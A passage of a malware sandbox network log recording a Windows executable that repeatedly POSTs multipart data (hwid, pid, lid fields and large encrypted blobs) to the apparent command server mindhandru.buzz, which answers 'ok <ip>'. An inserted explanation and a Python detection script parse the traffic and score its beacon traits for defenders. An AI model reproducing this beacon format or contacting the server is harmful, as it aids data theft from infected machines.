                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 15021
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:02:01 UTC15021OUTData Raw: 2d 2d 32 39 47 4b 58 35 38 50 51 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 34 34 42 45 31 34 42 31 39 34 42 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 39 47 4b 58 35 38 50 51 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 39 47 4b 58 35 38 50 51 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 39 47 4b 58 35 38 50 51 47 4e 0d 0a 43 6f 6e 74
                                                                                                              Data Ascii: --29GKX58PQGNContent-Disposition: form-data; name="hwid"5A044BE14B194BFCBEBA0C6A975F1733--29GKX58PQGNContent-Disposition: form-data; name="pid"2--29GKX58PQGNContent-Disposition: form-data; name="lid"PsFKDg--pablo--29GKX58PQGNCont
                                                                                                              2024-12-27 08:02:02 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:02:02 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=08tdvrh4gi5qrmmjur1kpiskhu; expires=Tue, 22 Apr 2025 01:48:40 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oIt6eKAgDRA8x686%2Fq9m7vFc%2F62JH%2BuiGx7na0Kd%2BNLB%2Bp7KX7BFtysGxej7nDbO5Vc97iIcsS9ltjh5PAbIA9EjWlCFk%2BrYBXwWN3iJCcIzxuQNiO5OLkuaTPnyvKkIFOM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c9378ef00caa-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1498&rtt_var=563&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15953&delivery_rate=1940199&cwnd=239&unsent_bytes=0&cid=ee5dd95183c993eb&ts=881&x=0"
                                                                                                              2024-12-27 08:02:02 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 08:02:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              4 | 192.168.2.9 | 49736 | 104.21.11.101 | 443 | 3784 | C:\Users\user\Desktop\onaUtwpiyq.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2024-12-27 08:02:03 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=Q5ZLR9WWZ7ZJ9
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20549
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:02:03 UTC15331OUTData Raw: 2d 2d 51 35 5a 4c 52 39 57 57 5a 37 5a 4a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 34 34 42 45 31 34 42 31 39 34 42 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 51 35 5a 4c 52 39 57 57 5a 37 5a 4a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 35 5a 4c 52 39 57 57 5a 37 5a 4a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 51 35 5a 4c 52 39 57 57 5a 37 5a
                                                                                                              Data Ascii: --Q5ZLR9WWZ7ZJ9Content-Disposition: form-data; name="hwid"5A044BE14B194BFCBEBA0C6A975F1733--Q5ZLR9WWZ7ZJ9Content-Disposition: form-data; name="pid"3--Q5ZLR9WWZ7ZJ9Content-Disposition: form-data; name="lid"PsFKDg--pablo--Q5ZLR9WWZ7Z
                                                                                                              2024-12-27 08:02:03 UTC5218OUTData Raw: ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd 4f 03 00 00 00 00 00
                                                                                                              Data Ascii: Z+?:us}Q0u?4E([:s~X`nO
                                                                                                              2024-12-27 08:02:04 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:02:04 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=tishbj55ujkn20rrc9k7673k04; expires=Tue, 22 Apr 2025 01:48:43 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9hBRVQpYrk1MbraEjWa14CCUac3Gta5Q8KeMiLA1HiaUUbvnpWqx69groTm50ZKG%2BKsO%2B%2BBk0w09dBNE4tYUYTChtYNqByFxdGKM9LevYKvM1r0yBIxUZgWZDLxyz46I6o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c946c8bd7c94-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1820&rtt_var=687&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21505&delivery_rate=1604395&cwnd=240&unsent_bytes=0&cid=48d387aaf951fd59&ts=1007&x=0"
                                                                                                              2024-12-27 08:02:04 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 08:02:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              5 | 192.168.2.9 | 49742 | 104.21.11.101 | 443 | 3784 | C:\Users\user\Desktop\onaUtwpiyq.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2024-12-27 08:02:06 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=F5ZQ1AADALN0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1183
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:02:06 UTC1183OUTData Raw: 2d 2d 46 35 5a 51 31 41 41 44 41 4c 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 34 34 42 45 31 34 42 31 39 34 42 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 46 35 5a 51 31 41 41 44 41 4c 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 35 5a 51 31 41 41 44 41 4c 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 46 35 5a 51 31 41 41 44 41 4c 4e 30 0d 0a
                                                                                                              Data Ascii: --F5ZQ1AADALN0Content-Disposition: form-data; name="hwid"5A044BE14B194BFCBEBA0C6A975F1733--F5ZQ1AADALN0Content-Disposition: form-data; name="pid"1--F5ZQ1AADALN0Content-Disposition: form-data; name="lid"PsFKDg--pablo--F5ZQ1AADALN0
                                                                                                              2024-12-27 08:02:07 UTC | 1134 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:02:07 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=2p42q80kf91oklogc9debafgue; expires=Tue, 22 Apr 2025 01:48:46 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ErZvANHEVMcnlcXLyGDd2lzfN%2BvMHX76%2BmO37OAUfXF3%2FLSpYWyTAYS2e15DgfWh1P4BnPK%2FAgz96yDH9%2Fq6ccd54TzgOdKyr%2FHB3znV%2Br%2FX0SOjlOxodrVTSPvEklMxlk4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c95919db7290-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1774&rtt_var=678&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2093&delivery_rate=1599123&cwnd=249&unsent_bytes=0&cid=581be141f0f166cd&ts=811&x=0"
                                                                                                              2024-12-27 08:02:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 08:02:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0

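Every /api POST in this report has the same shape: a multipart/form-data body opening with hwid, pid and lid parts (boundary 29GKX58PQGN in the first exchange above, then Q5ZLR9WWZ7ZJ9, F5ZQ1AADALN0 and GLB0WX83D below), a hard-coded Chrome/119 User-Agent, and a chunked reply whose only chunk is "ok 8.46.123.189" (the leading "f" in the Data Ascii rendering is the hex chunk length 15; the CR/LF bytes are stripped from that rendering). The Python below is an added example, not code from the Joe Sandbox report or from the sample: it rebuilds the first request body from the hex dump, parses the multipart parts RFC 2046 style, decodes the chunked reply, and scores a request against the traits visible in these sessions. The dictionary form of the headers, the boundary-length and lid-shape thresholds in beacon_indicators, and the omission of the encrypted payload part are this example's assumptions; nothing is claimed about what hwid, pid or lid mean beyond their field names.

```python
import re
from typing import Dict, List, Optional

# Multipart body rebuilt from the hex dump of the first /api POST above (only the
# hwid/pid/lid parts; the encrypted payload part that follows them is omitted).
BOUNDARY = "29GKX58PQGN"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    "5A044BE14B194BFCBEBA0C6A975F1733\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="pid"\r\n\r\n'
    "2\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="lid"\r\n\r\n'
    "PsFKDg--pablo\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()

# Request line and headers as captured; the dict layout is this example's own.
SAMPLE_HEADERS = {
    "method": "POST",
    "path": "/api",
    "Host": "mindhandru.buzz",
    "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
}

# Chunked reply exactly as captured: chunk size "f" (15 bytes), then the "0" terminator.
SAMPLE_RESPONSE = bytes.fromhex(
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a 30 0d 0a 0d 0a"
)


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Split a multipart/form-data body into {name: value}.

    The RFC 2046 delimiter is CRLF + "--" + boundary, so a CRLF is prepended and
    the split is done on the whole delimiter; binary values containing CRLF survive.
    """
    delim = b"\r\n--" + boundary.encode()
    fields: Dict[str, bytes] = {}
    for part in (b"\r\n" + body).split(delim)[1:]:
        if part.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', head)
        if sep and match:
            fields[match.group(1).decode()] = value
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-coded body (chunk extensions ignored)."""
    out = bytearray()
    pos = 0
    while True:
        line_end = raw.index(b"\r\n", pos)
        size = int(raw[pos:line_end].split(b";")[0], 16)
        if size == 0:
            return bytes(out)
        data_start = line_end + 2
        out += raw[data_start:data_start + size]
        pos = data_start + size + 2          # skip the CRLF that ends the chunk


def parse_ack(body: bytes) -> Optional[str]:
    """Return the IPv4 address from an 'ok <ip>' acknowledgement, else None."""
    match = re.fullmatch(rb"ok (\d{1,3}(?:\.\d{1,3}){3})", body.strip())
    return match.group(1).decode() if match else None


def beacon_indicators(headers: Dict[str, str], body: bytes) -> List[str]:
    """List the traits of this report's /api POSTs that one request exhibits.

    Thresholds (boundary 8-16 uppercase alphanumerics, lid as <token>--<name>)
    are assumptions read off the captured requests; no single hit is proof.
    """
    hits: List[str] = []
    if headers.get("method") == "POST" and headers.get("path") == "/api":
        hits.append("POST /api")
    ctype = headers.get("Content-Type", "")
    bmatch = re.search(r"boundary=([A-Z0-9]{8,16})$", ctype)
    if ctype.startswith("multipart/form-data") and bmatch:
        hits.append("multipart with short uppercase alphanumeric boundary")
        fields = parse_multipart(body, bmatch.group(1))
        if {"hwid", "pid", "lid"}.issubset(fields):
            hits.append("hwid/pid/lid form fields")
        if re.fullmatch(rb"[0-9A-F]{32}", fields.get("hwid", b"")):
            hits.append("hwid is 32 uppercase hex chars")
        if re.fullmatch(rb"[A-Za-z0-9]+--[A-Za-z0-9]+", fields.get("lid", b"")):
            hits.append("lid has <token>--<name> shape")
    if "Chrome/119.0.0.0" in headers.get("User-Agent", ""):
        hits.append("hard-coded Chrome/119 User-Agent")
    return hits


if __name__ == "__main__":
    print(parse_multipart(SAMPLE_BODY, BOUNDARY))
    print(parse_ack(decode_chunked(SAMPLE_RESPONSE)))
    print(beacon_indicators(SAMPLE_HEADERS, SAMPLE_BODY))
```

Run against the rebuilt first request, beacon_indicators reports all six traits and parse_ack recovers 8.46.123.189 from the decoded chunk; in practice the same functions would be fed requests reconstructed from proxy logs or a PCAP, and a rule would fire on the combination of traits rather than on any one of them, since multipart POSTs with a Chrome User-Agent are ordinary on their own.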

                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              6 | 192.168.2.9 | 49749 | 104.21.11.101 | 443 | 3784 | C:\Users\user\Desktop\onaUtwpiyq.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2024-12-27 08:02:09 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=GLB0WX83D
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 584814
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: 2d 2d 47 4c 42 30 57 58 38 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 34 34 42 45 31 34 42 31 39 34 42 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 47 4c 42 30 57 58 38 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 4c 42 30 57 58 38 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 47 4c 42 30 57 58 38 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                              Data Ascii: --GLB0WX83DContent-Disposition: form-data; name="hwid"5A044BE14B194BFCBEBA0C6A975F1733--GLB0WX83DContent-Disposition: form-data; name="pid"1--GLB0WX83DContent-Disposition: form-data; name="lid"PsFKDg--pablo--GLB0WX83DContent-Disp
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: f0 0c ea c4 dd e6 80 5d 5b 0c 4c 83 26 96 77 4b aa c9 0c 83 f8 9d 5b 62 a4 cb 10 69 fd 74 df b5 73 c4 de 43 d1 b0 af c8 0c 2f 83 89 6a 9d 58 13 ec 29 1c 8a 64 f2 93 54 74 26 0d 00 c6 e6 78 19 fe 14 85 96 76 fa 71 ea 71 63 15 c2 39 f3 1c 41 ea ec 86 22 a3 de 93 12 76 07 1b ca 8d 92 86 28 48 da 6f 9c e2 52 44 cb fd f4 88 26 f0 6d 4a 65 bd 43 25 27 58 85 19 f7 29 54 b3 bc c5 8f 61 d0 a6 f0 e1 9c 93 1e 58 92 ec cb 4a 8f 73 f9 db fb 71 85 40 12 bf 5a c2 0d 43 ac af 4e 6f 8a 9a 33 69 12 75 98 d5 e9 51 ce 2d 28 7f 56 ab 5c 9b 9e bc 58 b7 c3 34 12 c9 4e 43 51 fc 30 97 74 9a 03 c3 0a fb 61 6e 81 e9 6f e3 e7 c6 6b ec d1 0d 45 67 8f c7 ef f5 59 1b c5 d9 a9 10 6e 18 1b 35 a1 84 ec 06 8c 33 f0 d7 0c 6c 14 e4 d6 bf db 67 d5 89 89 cc 28 53 e6 3a eb 1e 10 45 39 bf 1c 02
                                                                                                              Data Ascii: ][L&wK[bitsC/jX)dTt&xvqqc9A"v(HoRD&mJeC%'X)TaXJsq@ZCNo3iuQ-(V\X4NCQ0tanokEgYn53lg(S:E9
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: 89 9f bb bd f8 9f 80 dd 5f b7 3e e1 4f fe 24 2d 0e 8f f5 8a 2e 62 e2 75 c1 54 8d 18 f6 d9 e7 2b de 7c 78 19 e5 4e 1b 34 cc 3d 7d 07 8d eb 81 18 d6 8e 72 ea 1b eb 63 df b1 9b bd 0f 9e ed 9a 0e 4a b5 05 86 1f ff b6 c7 60 bc fb 56 ea c7 92 25 c3 fc 4c 5c d4 f9 5b 6d 6f cf f1 61 8f 29 bb c7 da 45 8a e2 2e 69 96 f7 f2 92 f8 c5 89 18 30 77 62 9e 51 77 90 72 0c 2e 10 a5 ea a4 d8 22 59 fa ef 67 1f f1 a2 b4 7a 9f d8 bf 13 8b b0 7c 98 65 48 35 78 93 53 9d 95 fe a5 9b de ea 13 3d 7b f5 fd e2 1b 99 cd d3 c3 4f 46 78 ee 51 aa 6e 53 a8 15 8c 7c ee d2 03 33 eb 1e 87 79 50 db d2 94 3a da 6e c1 81 4b 56 87 40 c8 fb cc 2d 81 e0 c3 e4 7c b9 ad 13 a9 97 fc b8 92 6b 29 75 88 62 bb f2 7e 89 9a 0c bb ff e8 8d 30 a8 2a 59 46 d5 97 a7 1e 32 6f ca bc 2b f8 56 5a ad ff 66 a0 1c df
                                                                                                              Data Ascii: _>O$-.buT+|xN4=}rcJ`V%L\[moa)E.i0wbQwr."Ygz|eH5xS={OFxQnS|3yP:nKV@-|k)ub~0*YF2o+VZf
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: a3 4f ef 2b 78 14 7a 6f d6 33 66 65 7f df a6 c0 7e ba 10 b6 f8 09 fb 46 72 75 27 9f ab 9e d0 de c8 9d db b3 fb 2d f9 d1 69 1c 92 eb 96 2b f5 30 14 69 12 8c 38 77 3f 9c e9 2b e4 f5 14 b4 aa 86 db 9b c8 2f 3a e1 6d 54 70 43 9b 8e b0 27 69 ed d2 81 c1 be ef 7c f8 b2 e1 74 3b 0e 8d 63 a3 b5 30 aa b5 55 f8 9a 96 7a 74 8f 02 b9 b0 d6 98 f5 d1 6f cb 58 3d 28 6c 6b e5 db 55 cb 44 2b 21 d2 a9 41 24 d5 1c 06 8b 97 07 17 b1 7a 72 30 a2 a1 26 69 df 5d d3 4b 67 18 67 13 8f 80 5e 11 f4 29 6b 32 d9 16 d8 9a 12 73 af a8 44 ee 7d 27 20 77 08 cc 1a 8e 6c de be ce 07 ca 34 63 4f 24 45 96 ef 0e 82 83 fd 42 40 00 d6 23 09 64 62 c8 73 ad c8 0f 28 5c f7 8f 1e 61 f0 f8 4d f9 c2 0f af 80 1b b9 22 84 cf b9 af 54 a4 c0 ba 62 c5 fb 6c 6e 8c d2 01 b4 f7 2f c4 05 e4 f9 75 37 a5 86 99
                                                                                                              Data Ascii: O+xzo3fe~Fru'-i+0i8w?+/:mTpC'i|t;c0UztoX=(lkUD+!A$zr0&i]Kgg^)k2sD}' wl4cO$EB@#dbs(\aM"Tbln/u7
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: c1 b8 10 b9 a5 1d d0 37 86 5e 81 68 15 de 76 ec 4b 39 ac 22 78 d9 c0 1e 6e a6 8b 8b ca d4 d9 80 77 c4 e1 b2 2c c8 ef 4e a6 0c d7 3a 02 42 86 78 b3 56 e1 f6 46 a7 f7 03 3d cd 9d 9f de f8 88 6b 8e d5 1e 07 29 74 1b 26 f7 ef 36 39 7c f9 e6 45 e8 17 ea 32 c7 77 58 23 a3 fa c5 4e bd a9 4e ce 4e 86 8f e7 2b 7e fc f9 8f 53 b4 24 fc fa b3 a2 b8 28 10 26 b5 f8 e6 a4 ad 27 6f ea e2 d5 d7 c4 e9 de 4e 0b 37 b8 f1 b1 88 a0 f2 ac 68 e3 c2 a9 30 a8 ec 11 75 9f 8a 87 1b eb c1 98 8c df 53 46 f8 68 e3 b8 08 bf 09 37 c1 4d 07 a4 19 33 eb de 1e 0f 3f e5 cc 64 61 e9 a8 0e d9 bc 57 ca 81 00 ce 19 11 c4 26 04 35 44 f7 71 9f 1d e5 71 1b 53 e3 c1 4f c5 f5 3b 41 85 9b a9 c4 64 2d de 5d 80 63 82 9b 7e d9 90 37 01 bf 08 ac 1c 72 ad 8d 7c e1 dd 41 6d d3 9d 90 82 ec b4 2a 31 33 e6 9e
                                                                                                              Data Ascii: 7^hvK9"xnw,N:BxVF=k)t&69|E2wX#NNN+~S$(&'oN7h0uSFh7M3?daW&5DqqSO;Ad-]c~7r|Am*13
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: 64 4a 52 52 7c 35 0f 4c 24 17 dd d5 46 a9 c8 af 97 6e 57 96 42 ad 7d a4 36 c8 4e d2 b3 9a 38 a3 26 f2 f0 c0 1d fa 29 55 08 ec 5b 12 a1 d6 6c e0 f0 21 9e 10 dd a8 16 f8 ce bc 67 af dd 57 bb 31 51 30 39 90 34 f1 12 10 f6 31 2e 48 31 e6 1b f7 fa 11 da 3e c3 27 f8 46 00 e3 22 02 a1 9e e0 e0 3b 50 ab 04 28 47 fc 20 00 fa 3d 18 ae 1e f3 48 39 12 fc e1 b2 4d 49 18 2b c3 d3 3e 7f 63 5d e4 20 a9 9c 1b 7f 97 7c 8e c6 2c 70 6a ae 5a eb fb a1 1c fe 97 a7 98 6b ba 9e 59 a0 90 b8 de 8c 26 4b 0a 98 3d 9c 5d d9 ae 32 ba 67 50 c4 6b b5 c6 53 fd 8c fb d7 6a 76 7a d5 62 e6 c4 20 7b 41 8f 4b 4d 96 6a e0 7d 72 2a da f3 83 93 ae a8 8f 71 f2 1b fe 38 54 75 fe 02 2f 7f 37 e8 de 03 c2 3f 69 1e d3 01 57 fb 99 67 b0 60 27 84 8a 67 b8 2e bd e9 12 90 8f 16 ec 8b 59 4d 87 d0 74 97 28
                                                                                                              Data Ascii: dJRR|5L$FnWB}6N8&)U[l!gW1Q0941.H1>'F";P(G =H9MI+>c] |,pjZkY&K=]2gPkSjvzb {AKMj}r*q8Tu/7?iWg`'g.YMt(
